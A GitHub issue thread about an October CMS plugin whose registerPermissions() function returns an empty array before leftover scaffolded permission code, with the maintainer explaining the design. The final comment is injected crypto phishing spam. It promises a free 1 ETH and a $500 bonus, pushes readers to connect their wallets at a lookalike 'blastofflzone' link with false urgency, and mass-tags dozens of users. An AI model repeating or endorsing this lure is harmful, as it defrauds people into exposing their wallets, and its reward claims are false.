### ISSUE TITLE
Permissions don't work

### ISSUE THREAD

**Issue by Humni** [EdisonLV/oc-revisions-plugin#1]
There is an issue where the permissions don't work as there is a double return in the registerPermissions function. If this repo is still active I'll be happy to create a PR for it    

```
public function registerPermissions()
    {

        return [];

        return [
            'nedstrk.revisions.view' => [
                'tab' => 'Revisions',
                'label' => 'View CMS page revisions'
            ],
        ];
    }
```

**Comment by EdOzolins** [comment]
Hi Humni!

It was intended that way, the plugin permissions are dictated by "who can access theme logs" controlled for each backend admin.

**Comment by Humni** [comment]
@NedStrk Then why is there code after the return?

**Comment by EdOzolins** [comment]
> @NedStrk Then why is there code after the return?

It's a placeholder generated by an artisan command `php artisan create:plugin Acme.Blog`

**Comment by Humni** [comment]
@NedStrk  I'm aware - it should probably be removed :)

**Comment by pisgo** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
haochen14, @iinstances, @xh3, @rjl493456442, @ZainaliSyed, @ccccqcccc, @Littlegrace111, @lounlee, @wisdomcsharp, @microlost, @askari01, @mzf, @pjain, @burningsky250, @kingkastle, @yurited, @TugcaEker, @v1ct0rx, @hibbb, @gawbul, @AnibalRGC, @YQBird, @OXOYO, @gopalvirat, @dengxingwen, @jrhea, @pinebud, @sandeepcmsm, @externMing, @lnanhkhoa, @bqxu, @modongjie, @bgyss, @Krusca, @savil, @insipx, @YC-S, @LeonZZhou, @jdzhrch, @eyecatchup, @jineshshah36, @vskyman, @shenjiayu, @sunboshan, @greysign, @wikalp, @zhangrui231, @xwa130, @chpmrc, @ethanhua
